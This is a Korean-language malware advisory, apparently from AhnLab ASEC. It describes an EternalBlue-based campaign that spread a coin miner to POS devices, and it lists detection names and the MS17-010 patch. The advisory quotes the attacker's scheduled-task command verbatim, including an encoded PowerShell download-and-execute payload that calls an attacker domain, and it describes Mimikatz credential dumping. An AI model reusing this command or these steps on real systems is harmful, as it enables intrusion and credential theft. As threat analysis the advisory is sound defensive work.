안랩 ASEC은 지난 2월 11일 EternalBlue SMB 취약점으로 국내 POS 장비에 코인 마이너를 전파하는 공격을 확인하였다. 작년 6월에도 같은 이터널 블루 취약점으로 POS 장비의 인터넷이 마비되는 사건(https://asec.ahnlab.com/1143)이 있었으며 재작년 ‘WannaCrypt’ 이슈부터 현재까지도 공격자들은 SMB 취약점 공격을 악성코드를 전파하는 데 사용하고 있다. 추가로 이번 공격에 사용된 악성코드는 1월 28일 중국 Tencent 업체에서 언급된 것과 동일한 기능을 갖는 것으로 확인되었다. (https://guanjia.qq.com/news/n3/2475.html)
해당 취약점 공격은 윈도우 보안 패치로 방어할 수 있으므로 POS 장비뿐만 아니라 아직 MS 패치를 적용하지 않은 시스템은 감염 피해를 예방하기 위해 업데이트가 시급하다. 이번 국내 POS 장비 공격 과정은 [그림 1]과 같다.
[그림 1] 국내 POS 장비 공격 흐름도
공격 과정 중 EternalBlue SMB 취약점 공격을 발생시키는 주체인 "svchost.exe" 파일의 주요 기능은 아래와 같다.
[네트워크 행위]
- 로컬 시스템의 60124번 포트 바인딩
- 445번 포트 방화벽 설정
- 파워쉘 명령어를 통해 특정 도메인(v.beahh.com)에서 스크립트를 다운로드
- ipconfig /all, netstat –na 명령을 확인되는 모든 ip 대역을 스캔
- http://ip.42.pl/raw, http://jsonip.com 사이트에서 확인되는 ip 대역을 스캔
- SMB 취약점이 확인된 PC에 아래 파워쉘 명령어 실행 -> http://v.beahh.com/v 사이트 접속 후 스크립트 다운로드 명령
cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcA ZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAO gAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&&c:\\windows\\temp\\svchost.exe |
[시스템 행위]
- 파워쉘 명령어를 통해 윈도우 계정 패스워드 확인 툴인 MIMIKATZ 실행 (m.ps1)
- MIMIKATZ 툴을 통해서 얻은 계정 정보와 사용자 도메인 정보를 c:\windows\temp\mkatz.ini에 저장
- 파워쉘이 없는 시스템 환경(xp)일 경우 http://w.beahh.com/page.html에 접속하여 스크립트를 다운로드 및 실행
[파일 진단]
현재 안랩 제품에서는 해당 악성코드들을 다음과 같이 진단하고 있다.
파일명 |
진단명 |
svchost.exe (SMB 전파) |
Trojan/Win32.Trickster.R254998 |
svchost.exe (sample.exe) |
Malware/Win32.Generic.C2950422 |
wmiex.exe (MAL 1) |
Trojan/Win32.Agent.R254993 |
taskmgr.exe (MAL 2 32bit Binary) |
Malware/Win32.Nsanti.C2957178 |
taskmgr.exe (MAL 2 64bit Binary) |
Trojan/Win64.Agent.C3009705 |
m.ps1 (윈도우 계정탈취) | SCRIPT/Powershell |
[URL 차단]
[SMB 취약점 패치]
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
'악성코드 정보' 카테고리의 다른 글
국내 사용자를 대상으로 한 CLOP 랜섬웨어 유포 (0) | 2019.02.18 |
---|---|
국내 사용자를 대상으로 유포 중인 악성 Excel 문서 파일 (1) | 2019.02.14 |
‘EternalBlue’ SMB 취약점(MS17-010)을 통한 악성코드 감염 확산 (2) (1) | 2019.02.13 |
Microsoft Office Excel - DDE 이용 악성 기능 실행 (2) (0) | 2019.02.11 |
PDF 형태로 유포되는 Phishing 악성코드 (URL 탐지 우회) (0) | 2019.01.30 |
국내 유포 중인 Gandcrab v5.1 (0) | 2019.01.18 |
이터널 블루면 쉐도우브로터라는 해킹팀이 NSA 에서 빼낸 해킹프로그램 일종으로 아는데 맞나요?
답글